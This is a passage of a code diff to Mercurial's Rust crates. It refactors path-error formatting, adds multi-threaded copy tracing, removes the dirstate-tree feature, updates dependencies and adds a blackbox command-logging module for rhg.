WTF8 to Windows MBCS (ANSI encoding). // Perhaps, the return type would have to be Result<PathBuf>. + os_str +} - Path::new(os_str) +pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { + Path::new(get_os_str_from_bytes(bytes)) } // TODO: need to convert from WTF8 to MBCS bytes on Windows. // that's why Vec<u8> is returned. #[cfg(unix)] pub fn get_bytes_from_path(path: impl AsRef<Path>) -> Vec<u8> { + get_bytes_from_os_str(path.as_ref()) +} + +#[cfg(unix)] +pub fn get_bytes_from_os_str(str: impl AsRef<OsStr>) -> Vec<u8> { use std::os::unix::ffi::OsStrExt; - path.as_ref().as_os_str().as_bytes().to_vec() + str.as_ref().as_bytes().to_vec() } /// An iterator over repository path yielding itself and its ancestors. @@ -191,6 +199,12 @@ st_ctime: metadata.ctime(), } } + + pub fn is_symlink(&self) -> bool { + // This is way too manual, but `HgMetadata` will go away in the + // near-future dirstate rewrite anyway. + self.st_mode & 0170000 == 0120000 + } } /// Returns the canonical path of `name`, given `cwd` and `root` @@ -276,7 +290,13 @@ if cwd.as_ref().is_empty() { Cow::Borrowed(path.as_bytes()) } else { - let mut res: Vec<u8> = Vec::new(); + // This is not all accurate as to how large `res` will actually be, but + // profiling `rhg files` on a large-ish repo shows it’s better than + // starting from a zero-capacity `Vec` and letting `extend` reallocate + // repeatedly. + let guesstimate = path.as_bytes().len(); + + let mut res: Vec<u8> = Vec::with_capacity(guesstimate); let mut path_iter = path.as_bytes().split(|b| *b == b'/').peekable(); let mut cwd_iter = cwd.as_ref().as_bytes().split(|b| *b == b'/').peekable(); @@ -309,17 +329,6 @@ } } -/// Reads a file in one big chunk instead of doing multiple reads -pub fn read_whole_file(filepath: &Path) -> std::io::Result<Vec<u8>> { - let mut file = std::fs::File::open(filepath)?; - let size = file.metadata()?.len(); - - let mut res = vec![0; size as usize]; - file.read_exact(&mut res)?; - - Ok(res) -} - #[cfg(test)] mod tests { use super::*; diff --git a/rust/hg-core/src/utils/hg_path.rs b/rust/hg-core/src/utils/hg_path.rs --- a/rust/hg-core/src/utils/hg_path.rs +++ b/rust/hg-core/src/utils/hg_path.rs @@ -47,57 +47,68 @@ }, } -impl ToString for HgPathError { - fn to_string(&self) -> String { +impl fmt::Display for HgPathError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { HgPathError::LeadingSlash(bytes) => { - format!("Invalid HgPath '{:?}': has a leading slash.", bytes) + write!(f, "Invalid HgPath '{:?}': has a leading slash.", bytes) } HgPathError::ConsecutiveSlashes { bytes, second_slash_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': consecutive slashes at pos {}.", bytes, pos ), HgPathError::ContainsNullByte { bytes, null_byte_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': contains null byte at pos {}.", bytes, pos ), - HgPathError::DecodeError(bytes) => { - format!("Invalid HgPath '{:?}': could not be decoded.", bytes) - } + HgPathError::DecodeError(bytes) => write!( + f, + "Invalid HgPath '{:?}': could not be decoded.", + bytes + ), HgPathError::EndsWithSlash(path) => { - format!("Audit failed for '{}': ends with a slash.", path) + write!(f, "Audit failed for '{}': ends with a slash.", path) } - HgPathError::ContainsIllegalComponent(path) => format!( + HgPathError::ContainsIllegalComponent(path) => write!( + f, "Audit failed for '{}': contains an illegal component.", path ), - HgPathError::InsideDotHg(path) => format!( + HgPathError::InsideDotHg(path) => write!( + f, "Audit failed for '{}': is inside the '.hg' folder.", path ), HgPathError::IsInsideNestedRepo { path, nested_repo: nested, - } => format!( + } => { + write!(f, "Audit failed for '{}': is inside a nested repository '{}'.", path, nested - ), - HgPathError::TraversesSymbolicLink { path, symlink } => format!( + ) + } + HgPathError::TraversesSymbolicLink { path, symlink } => write!( + f, "Audit failed for '{}': traverses symbolic link '{}'.", path, symlink ), - HgPathError::NotFsCompliant(path) => format!( + HgPathError::NotFsCompliant(path) => write!( + f, "Audit failed for '{}': cannot be turned into a \ filesystem path.", path ), - HgPathError::NotUnderRoot { path, root } => format!( + HgPathError::NotUnderRoot { path, root } => write!( + f, "Audit failed for '{}': not under root {}.", path.display(), root.display() @@ -367,7 +378,9 @@ } } -#[derive(Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash)] +#[derive( + Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash, derive_more::From, +)] pub struct HgPathBuf { inner: Vec<u8>, } @@ -408,12 +421,6 @@ } } -impl From<Vec<u8>> for HgPathBuf { - fn from(vec: Vec<u8>) -> Self { - Self { inner: vec } - } -} - impl<T: ?Sized + AsRef<HgPath>> From<&T> for HgPathBuf { fn from(s: &T) -> HgPathBuf { s.as_ref().to_owned() diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -10,7 +10,6 @@ [features] default = ["python27"] -dirstate-tree = ["hg-core/dirstate-tree"] # Features to build an extension module: python27 = ["cpython/python27-sys", "cpython/extension-module-2-7"] @@ -22,11 +21,12 @@ python3-bin = ["cpython/python3-sys"] [dependencies] +crossbeam-channel = "0.4" hg-core = { path = "../hg-core"} libc = '*' log = "0.4.8" env_logger = "0.7.1" [dependencies.cpython] -version = "0.4.1" +version = "0.5.2" default-features = false diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -1,7 +1,7 @@ use cpython::ObjectProtocol; -use cpython::PyBool; use cpython::PyBytes; use cpython::PyDict; +use cpython::PyDrop; use cpython::PyList; use cpython::PyModule; use cpython::PyObject; @@ -9,13 +9,63 @@ use cpython::PyTuple; use cpython::Python; -use hg::copy_tracing::combine_changeset_copies; use hg::copy_tracing::ChangedFiles; -use hg::copy_tracing::DataHolder; -use hg::copy_tracing::RevInfo; -use hg::copy_tracing::RevInfoMaker; +use hg::copy_tracing::CombineChangesetCopies; use hg::Revision; +use self::pybytes_with_data::PyBytesWithData; + +// Module to encapsulate private fields +mod pybytes_with_data { + use cpython::{PyBytes, Python}; + + /// Safe abstraction over a `PyBytes` together with the `&[u8]` slice + /// that borrows it. + /// + /// Calling `PyBytes::data` requires a GIL marker but we want to access the + /// data in a thread that (ideally) does not need to acquire the GIL. + /// This type allows separating the call an the use. + pub(super) struct PyBytesWithData { + #[allow(unused)] + keep_alive: PyBytes, + + /// Borrows the buffer inside `self.keep_alive`, + /// but the borrow-checker cannot express self-referential structs. + data: *const [u8], + } + + fn require_send<T: Send>() {} + + #[allow(unused)] + fn static_assert_pybytes_is_send() { + require_send::<PyBytes>; + } + + // Safety: PyBytes is Send. Raw pointers are not by default, + // but here sending one to another thread is fine since we ensure it stays + // valid. + unsafe impl Send for PyBytesWithData {} + + impl PyBytesWithData { + pub fn new(py: Python, bytes: PyBytes) -> Self { + Self { + data: bytes.data(py), + keep_alive: bytes, + } + } + + pub fn data(&self) -> &[u8] { + // Safety: the raw pointer is valid as long as the PyBytes is still + // alive, and the returned slice borrows `self`. + unsafe { &*self.data } + } + + pub fn unwrap(self) -> PyBytes { + self.keep_alive + } + } +} + /// Combines copies information contained into revision `revs` to build a copy /// map. /// @@ -26,88 +76,135 @@ children_count: PyDict, target_rev: Revision, rev_info: PyObject, - is_ancestor: PyObject, + multi_thread: bool, ) -> PyResult<PyDict> { - let revs: PyResult<_> = - revs.iter(py).map(|r| Ok(r.extract(py)?)).collect(); - - // Wrap the `is_ancestor` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. - let is_ancestor_wrap = |anc: Revision, desc: Revision| -> bool { - is_ancestor - .call(py, (anc, desc), None) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - failed", - ) - .cast_into::<PyBool>(py) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - returned unexpected non-Bool value", - ) - .is_true() - }; - - // Wrap the `rev_info_maker` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. - let rev_info_maker: RevInfoMaker<PyBytes> = - Box::new(|rev: Revision, d: &mut DataHolder<PyBytes>| -> RevInfo { - let res: PyTuple = rev_info - .call(py, (rev,), None) - .expect("rust-copy-tracing: python call to `rev_info` failed") - .cast_into(py) - .expect( - "rust-copy_tracing: python call to `rev_info` returned \ - unexpected non-Tuple value", - ); - let p1 = res.get_item(py, 0).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - let p2 = res.get_item(py, 1).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - - let files = match res.get_item(py, 2).extract::<PyBytes>(py) { - Ok(raw) => { - // Give responsability for the raw bytes lifetime to - // hg-core - d.data = Some(raw); - let addrs = d.data.as_ref().expect( - "rust-copy-tracing: failed to get a reference to the \ - raw bytes for copy data").data(py); - ChangedFiles::new(addrs) - } - // value was presumably None, meaning they was no copy data. - Err(_) => ChangedFiles::new_empty(), - }; - - (p1, p2, files) - }); - let children_count: PyResult<_> = children_count + let children_count = children_count .items(py) .iter() .map(|(k, v)| Ok((k.extract(py)?, v.extract(py)?))) - .collect(); + .collect::<PyResult<_>>()?; + + /// (Revision number, parent 1, parent 2, copy data for this revision) + type RevInfo<Bytes> = (Revision, Revision, Revision, Option<Bytes>); + + let revs_info = + revs.iter(py).map(|rev_py| -> PyResult<RevInfo<PyBytes>> { + let rev = rev_py.extract(py)?; + let tuple: PyTuple = + rev_info.call(py, (rev_py,), None)?.cast_into(py)?; + let p1 = tuple.get_item(py, 0).extract(py)?; + let p2 = tuple.get_item(py, 1).extract(py)?; + let opt_bytes = tuple.get_item(py, 2).extract(py)?; + Ok((rev, p1, p2, opt_bytes)) + }); + + let path_copies; + if !multi_thread { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let files = match &opt_bytes { + Some(bytes) => ChangedFiles::new(bytes.data(py)), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + path_copies = combine_changeset_copies.finish(target_rev) + } else { + // Use a bounded channel to provide back-pressure: + // if the child thread is slower to process revisions than this thread + // is to gather data for them, an unbounded channel would keep + // growing and eat memory. + // + // TODO: tweak the bound? + let (rev_info_sender, rev_info_receiver) = + crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000); + + // This channel (going the other way around) however is unbounded. + // If they were both bounded, there might potentially be deadlocks + // where both channels are full and both threads are waiting on each + // other. + let (pybytes_sender, pybytes_receiver) = + crossbeam_channel::unbounded(); - let res = combine_changeset_copies( - revs?, - children_count?, - target_rev, - rev_info_maker, - &is_ancestor_wrap, - ); + // Start a thread that does CPU-heavy processing in parallel with the + // loop below. + // + // If the parent thread panics, `rev_info_sender` will be dropped and + // “disconnected”. `rev_info_receiver` will be notified of this and + // exit its own loop. + let thread = std::thread::spawn(move || { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + for (rev, p1, p2, opt_bytes) in rev_info_receiver { + let files = match &opt_bytes { + Some(raw) => ChangedFiles::new(raw.data()), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + combine_changeset_copies.add_revision(rev, p1, p2, files); + + // Send `PyBytes` back to the parent thread so the parent + // thread can drop it. Otherwise the GIL would be implicitly + // acquired here through `impl Drop for PyBytes`. + if let Some(bytes) = opt_bytes { + if let Err(_) = pybytes_sender.send(bytes.unwrap()) { + // The channel is disconnected, meaning the parent + // thread panicked or returned + // early through + // `?` to propagate a Python exception. + break; + } + } + } + + combine_changeset_copies.finish(target_rev) + }); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let opt_bytes = opt_bytes.map(|b| PyBytesWithData::new(py, b)); + + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + py.allow_threads(|| { + rev_info_sender.send((rev, p1, p2, opt_bytes)).expect( + "combine_changeset_copies: channel is disconnected", + ); + }); + + // Drop anything in the channel, without blocking + for pybytes in pybytes_receiver.try_iter() { + pybytes.release_ref(py) + } + } + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + path_copies = py.allow_threads(|| { + // Disconnect the channel to signal the child thread to stop: + // the `for … in rev_info_receiver` loop will end. + drop(rev_info_sender); + + // Wait for the child thread to stop, and propagate any panic. + thread.join().unwrap_or_else(|panic_payload| { + std::panic::resume_unwind(panic_payload) + }) + }); + + // Drop anything left in the channel + for pybytes in pybytes_receiver.iter() { + pybytes.release_ref(py) + } + }; + let out = PyDict::new(py); - for (dest, source) in res.into_iter() { + for (dest, source) in path_copies.into_iter() { out.set_item( py, PyBytes::new(py, &dest.into_vec()), @@ -135,7 +232,7 @@ children: PyDict, target_rev: Revision, rev_info: PyObject, - is_ancestor: PyObject + multi_thread: bool ) ), )?; diff --git a/rust/hg-cpython/src/dirstate.rs b/rust/hg-cpython/src/dirstate.rs --- a/rust/hg-cpython/src/dirstate.rs +++ b/rust/hg-cpython/src/dirstate.rs @@ -24,10 +24,7 @@ exc, PyBytes, PyDict, PyErr, PyList, PyModule, PyObject, PyResult, PySequence, Python, }; -use hg::{ - utils::hg_path::HgPathBuf, DirstateEntry, DirstateParseError, EntryState, - StateMap, -}; +use hg::{utils::hg_path::HgPathBuf, DirstateEntry, EntryState, StateMap}; use libc::{c_char, c_int}; use std::convert::TryFrom; @@ -79,11 +76,10 @@ .map(|(filename, stats)| { let stats = stats.extract::<PySequence>(py)?; let state = stats.get_item(py, 0)?.extract::<PyBytes>(py)?; - let state = EntryState::try_from(state.data(py)[0]).map_err( - |e: DirstateParseError| { + let state = + EntryState::try_from(state.data(py)[0]).map_err(|e| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) - }, - )?; + })?; let mode = stats.get_item(py, 1)?.extract(py)?; let size = stats.get_item(py, 2)?.extract(py)?; let mtime = stats.get_item(py, 3)?.extract(py)?; diff --git a/rust/hg-cpython/src/dirstate/dirs_multiset.rs b/rust/hg-cpython/src/dirstate/dirs_multiset.rs --- a/rust/hg-cpython/src/dirstate/dirs_multiset.rs +++ b/rust/hg-cpython/src/dirstate/dirs_multiset.rs @@ -18,9 +18,9 @@ use crate::dirstate::extract_dirstate; use hg::{ + errors::HgError, utils::hg_path::{HgPath, HgPathBuf}, - DirsMultiset, DirsMultisetIter, DirstateMapError, DirstateParseError, - EntryState, + DirsMultiset, DirsMultisetIter, DirstateMapError, EntryState, }; py_class!(pub class Dirs |py| { @@ -38,7 +38,7 @@ skip_state = Some( skip.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ); @@ -46,7 +46,7 @@ let inner = if let Ok(map) = map.cast_as::<PyDict>(py) { let dirstate = extract_dirstate(py, &map)?; DirsMultiset::from_dirstate(&dirstate, skip_state) - .map_err(|e| { + .map_err(|e: DirstateMapError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })? } else { diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -14,8 +14,8 @@ use cpython::{ exc, ObjectProtocol, PyBool, PyBytes, PyClone, PyDict, PyErr, PyList, - PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, - UnsafePyLeaked, + PyObject, PyResult, PySet, PyString, PyTuple, Python, PythonObject, + ToPyObject, UnsafePyLeaked, }; use crate::{ @@ -24,12 +24,14 @@ NonNormalEntries, NonNormalEntriesIterator, }, dirstate::{dirs_multiset::Dirs, make_dirstate_tuple}, + parsers::dirstate_parents_to_pytuple, }; use hg::{ + errors::HgError, + revlog::Node, utils::hg_path::{HgPath, HgPathBuf}, DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap, - DirstateMapError, DirstateParents, DirstateParseError, EntryState, - StateMapIter, PARENT_SIZE, + DirstateMapError, DirstateParents, EntryState, StateMapIter, }; // TODO @@ -84,13 +86,13 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, DirstateEntry { state: state.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, mode: mode.extract(py)?, @@ -113,7 +115,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, size.extract(py)?, @@ -137,7 +139,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ) @@ -173,18 +175,11 @@ let (_, other_parent) = inner_shared.get_non_normal_other_parent_entries(); - let locals = PyDict::new(py); - locals.set_item( - py, - "other_parent", - other_parent - .iter() - .map(|v| PyBytes::new(py, v.as_bytes())) - .collect::<Vec<PyBytes>>() - .to_py_object(py), - )?; - - py.eval("set(other_parent)", None, Some(&locals)) + let set = PySet::empty(py)?; + for path in other_parent.iter() { + set.add(py, PyBytes::new(py, path.as_bytes()))?; + } + Ok(set.into_object()) } def non_normal_entries(&self) -> PyResult<NonNormalEntries> { @@ -285,10 +280,7 @@ def parents(&self, st: PyObject) -> PyResult<PyTuple> { self.inner(py).borrow_mut() .parents(st.extract::<PyBytes>(py)?.data(py)) - .and_then(|d| { - Ok((PyBytes::new(py, &d.p1), PyBytes::new(py, &d.p2)) - .to_py_object(py)) - }) + .map(|parents| dirstate_parents_to_pytuple(py, parents)) .or_else(|_| { Err(PyErr::new::<exc::OSError, _>( py, @@ -311,9 +303,8 @@ .read(st.extract::<PyBytes>(py)?.data(py)) { Ok(Some(parents)) => Ok(Some( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py) - .into_object(), + dirstate_parents_to_pytuple(py, parents) + .into_object() )), Ok(None) => Ok(Some(py.None())), Err(_) => Err(PyErr::new::<exc::OSError, _>( @@ -549,14 +540,12 @@ ) -> Ref<'a, RustDirstateMap> { self.inner(py).borrow() } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key( py: Python, res: (&HgPathBuf, &DirstateEntry), ) -> PyResult<Option<PyBytes>> { Ok(Some(PyBytes::new(py, res.0.as_bytes()))) } - #[cfg(not(feature = "dirstate-tree"))] fn translate_key_value( py: Python, res: (&HgPathBuf, &DirstateEntry), @@ -567,24 +556,6 @@ make_dirstate_tuple(py, &entry)?, ))) } - #[cfg(feature = "dirstate-tree")] - fn translate_key( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<PyBytes>> { - Ok(Some(PyBytes::new(py, res.0.as_bytes()))) - } - #[cfg(feature = "dirstate-tree")] - fn translate_key_value( - py: Python, - res: (HgPathBuf, DirstateEntry), - ) -> PyResult<Option<(PyBytes, PyObject)>> { - let (f, entry) = res; - Ok(Some(( - PyBytes::new(py, f.as_bytes()), - make_dirstate_tuple(py, &entry)?, - ))) - } } py_shared_iterator!( @@ -601,7 +572,7 @@ Option<(PyBytes, PyObject)> ); -fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<[u8; PARENT_SIZE]> { +fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<Node> { let bytes = obj.extract::<PyBytes>(py)?; match bytes.data(py).try_into() { Ok(s) => Ok(s), diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -15,8 +15,7 @@ }; use hg::{ pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry, - DirstatePackError, DirstateParents, DirstateParseError, FastHashMap, - PARENT_SIZE, + DirstateParents, FastHashMap, PARENT_SIZE, }; use std::convert::TryInto; @@ -54,26 +53,9 @@ PyBytes::new(py, copy_path.as_bytes()), )?; } - Ok( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py), - ) + Ok(dirstate_parents_to_pytuple(py, parents)) } - Err(e) => Err(PyErr::new::<exc::ValueError, _>( - py, - match e { - DirstateParseError::TooLittleData => { - "too little data for parents".to_string() - } - DirstateParseError::Overflow => { - "overflow in dirstate".to_string() - } - DirstateParseError::CorruptedEntry(e) => e, - DirstateParseError::Damaged => { - "dirstate appears to be damaged".to_string() - } - }, - )), + Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())), } } @@ -128,18 +110,9 @@ } Ok(PyBytes::new(py, &packed)) } - Err(error) => Err(PyErr::new::<exc::ValueError, _>( - py, - match error { - DirstatePackError::CorruptedParent => { - "expected a 20-byte hash".to_string() - } - DirstatePackError::CorruptedEntry(e) => e, - DirstatePackError::BadSize(expected, actual) => { - format!("bad dirstate size: {} != {}", actual, expected) - } - }, - )), + Err(error) => { + Err(PyErr::new::<exc::ValueError, _>(py, error.to_string())) + } } } @@ -179,3 +152,12 @@ Ok(m) } + +pub(crate) fn dirstate_parents_to_pytuple( + py: Python, + parents: &DirstateParents, +) -> PyTuple { + let p1 = PyBytes::new(py, parents.p1.as_bytes()); + let p2 = PyBytes::new(py, parents.p2.as_bytes()); + (p1, p2).to_py_object(py) +} diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -12,13 +12,13 @@ use cpython::{ buffer::{Element, PyBuffer}, exc::{IndexError, ValueError}, - ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyModule, PyObject, - PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, + ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyInt, PyModule, + PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, }; use hg::{ nodemap::{Block, NodeMapError, NodeTree}, - revlog::{nodemap::NodeMap, RevlogIndex}, - NodeError, Revision, + revlog::{nodemap::NodeMap, NodePrefix, RevlogIndex}, + Revision, }; use std::cell::RefCell; @@ -64,7 +64,7 @@ let nt = opt.as_ref().unwrap(); let idx = &*self.cindex(py).borrow(); let node = node_from_py_bytes(py, &node)?; - nt.find_bin(idx, (&node).into()).map_err(|e| nodemap_error(py, e)) + nt.find_bin(idx, node.into()).map_err(|e| nodemap_error(py, e)) } /// same as `get_rev()` but raises a bare `error.RevlogError` if node @@ -107,7 +107,9 @@ String::from_utf8_lossy(node.data(py)).to_string() }; - nt.find_hex(idx, &node_as_string) + let prefix = NodePrefix::from_hex(&node_as_string).map_err(|_| PyErr::new::<ValueError, _>(py, "Invalid node or prefix"))?; + + nt.find_bin(idx, prefix) // TODO make an inner API returning the node directly .map(|opt| opt.map( |rev| PyBytes::new(py, idx.node(rev).unwrap().as_bytes()))) @@ -283,6 +285,10 @@ self.inner_update_nodemap_data(py, docket, nm_data) } + @property + def entry_size(&self) -> PyResult<PyInt> { + self.cindex(py).borrow().inner().getattr(py, "entry_size")?.extract::<PyInt>(py) + } }); @@ -468,17 +474,9 @@ match err { NodeMapError::MultipleResults => revlog_error(py), NodeMapError::RevisionNotInIndex(r) => rev_not_in_index(py, r), - NodeMapError::InvalidNodePrefix(s) => invalid_node_prefix(py, &s), } } -fn invalid_node_prefix(py: Python, ne: &NodeError) -> PyErr { - PyErr::new::<ValueError, _>( - py, - format!("Invalid node or prefix: {:?}", ne), - ) -} - /// Create the module, with __package__ given from parent pub fn init_module(py: Python, package: &str) -> PyResult<PyModule> { let dotted_name = &format!("{}.revlog", package); diff --git a/rust/hgcli/README.md b/rust/hgcli/README.md --- a/rust/hgcli/README.md +++ b/rust/hgcli/README.md @@ -32,7 +32,7 @@ Mercurial Distributed SCM (version 5.3.1+433-f99cd77d53dc+20200331) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-2020 Matt Mackall and others + Copyright (C) 2005-2020 Olivia Mackall and others This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -9,8 +9,13 @@ [dependencies] hg-core = { path = "../hg-core"} +chrono = "0.4.19" clap = "2.33.1" +derive_more = "0.99" +lazy_static = "1.4.0" log = "0.4.11" micro-timer = "0.3.1" +regex = "1.3.9" env_logger = "0.7.1" -format-bytes = "0.1.3" +format-bytes = "0.2.1" +users = "0.11.0" diff --git a/rust/rhg/src/blackbox.rs b/rust/rhg/src/blackbox.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/blackbox.rs @@ -0,0 +1,163 @@ +//! Logging for repository events, including commands run in the repository. + +use crate::CliInvocation; +use format_bytes::format_bytes; +use hg::errors::HgError; +use hg::repo::Repo; +use hg::utils::{files::get_bytes_from_os_str, shell_quote}; + +const ONE_MEBIBYTE: u64 = 1 << 20; + +// TODO: somehow keep defaults in sync with `configitem` in `hgext/blackbox.py` +const DEFAULT_MAX_SIZE: u64 = ONE_MEBIBYTE; +const DEFAULT_MAX_FILES: u32 = 7; + +// Python does not support %.3f, only %f +const DEFAULT_DATE_FORMAT: &str = "%Y/%m/%d %H:%M:%S%.3f"; + +type DateTime = chrono::DateTime<chrono::Local>; + +pub struct ProcessStartTime { + /// For measuring duration + monotonic_clock: std::time::Instant, + /// For formatting with year, month, day, etc. + calendar_based: DateTime, +} + +impl ProcessStartTime { + pub fn now() -> Self { + Self { + monotonic_clock: std::time::Instant::now(), + calendar_based: chrono::Local::now(), + } + } +} + +pub struct Blackbox<'a> { + process_start_time: &'a ProcessStartTime, + /// Do nothing if this is `None` + configured: Option<ConfiguredBlackbox<'a>>, +} + +struct ConfiguredBlackbox<'a> { + repo: &'a Repo, + max_size: u64, + max_files: u32, + date_format: &'a str, +} + +impl<'a> Blackbox<'a> { + pub fn new( + invocation: &'a CliInvocation<'a>, + process_start_time: &'a ProcessStartTime, + ) -> Result<Self, HgError> { + let configured = if let Ok(repo) = invocation.repo { + if invocation.config.get(b"extensions", b"blackbox").is_none() { + // The extension is not enabled + None + } else { + Some(ConfiguredBlackbox { + repo, + max_size: invocation + .config + .get_byte_size(b"blackbox", b"maxsize")? + .unwrap_or(DEFAULT_MAX_SIZE), + max_files: invocation + .config + .get_u32(b"blackbox", b"maxfiles")? + .unwrap_or(DEFAULT_MAX_FILES), + date_format: invocation + .config + .get_str(b"blackbox", b"date-format")? + .unwrap_or(DEFAULT_DATE_FORMAT), + }) + } + } else { + // Without a local repository there’s no `.hg/blackbox.log` to + // write to. + None + }; + Ok(Self { + process_start_time, + configured, + }) + } + + pub fn log_command_start(&self) { + if let Some(configured) = &self.configured { + let message = format_bytes!(b"(rust) {}", format_cli_args()); + configured.log(&self.process_start_time.calendar_based, &message); + } + } + + pub fn log_command_end(&self, exit_code: i32) { + if let Some(configured) = &self.configured { + let now = chrono::Local::now(); + let duration = self + .process_start_time + .monotonic_clock + .elapsed() + .as_secs_f64(); + let message = format_bytes!( + b"(rust) {} exited {} after {} seconds", + format_cli_args(), + exit_code, + format_bytes::Utf8(format_args!("{:.03}", duration)) + ); + configured.log(&now, &message); + } + } +} + +impl ConfiguredBlackbox<'_> { + fn log(&self, date_time: &DateTime, message: &[u8]) { + let date = format_bytes::Utf8(date_time.format(self.date_format)); + let user = users::get_current_username().map(get_bytes_from_os_str); + let user = user.as_deref().unwrap_or(b"???"); + let rev = format_bytes::Utf8(match self.repo.dirstate_parents() { + Ok(parents) if parents.p2 == hg::revlog::node::NULL_NODE => { + format!("{:x}", parents.p1) + } + Ok(parents) => format!("{:x}+{:x}", parents.p1, parents.p2), + Err(_dirstate_corruption_error) => { + // TODO: log a non-fatal warning to stderr + "???".to_owned() + } + }); + let pid = std::process::id(); + let line = format_bytes!( + b"{} {} @{} ({})> {}\n", + date, + user, + rev, + pid, + message + ); + let result = + hg::logging::LogFile::new(self.repo.hg_vfs(), "blackbox.log") + .max_size(Some(self.max_size)) + .max_files(self.max_files) + .write(&line); + match result { + Ok(()) => {} + Err(_io_error) => { + // TODO: log a non-fatal warning to stderr + } + } + } +} + +fn format_cli_args() -> Vec<u8> { + let mut args = std::env::args_os(); + let _ = args.next(); // Skip the first (or zeroth) arg, the name of the `rhg` executable + let mut args = args.map(|arg| shell_quote(&get_bytes_from_os_str(arg))); + let mut formatted = Vec::new(); + if let Some(arg) = args.next() { + formatted.extend(arg) + } + for arg in args { + formatted.push(b' '); + formatted.extend(arg) + } + formatted +} diff --git a/rust/rhg/src/commands.rs b/rust/rhg/src/commands.rs deleted file mode 100644 --- a/rust/rhg/src/commands.rs +++ /dev/null @@ -1,14 +0,0 @@ -pub mod cat; -pub mod debugdata; -pub mod debugrequirements; -pub mod files; -pub mod root; -use crate::error::CommandError; -use crate::ui::Ui; - -/// The common trait for rhg commands -/// 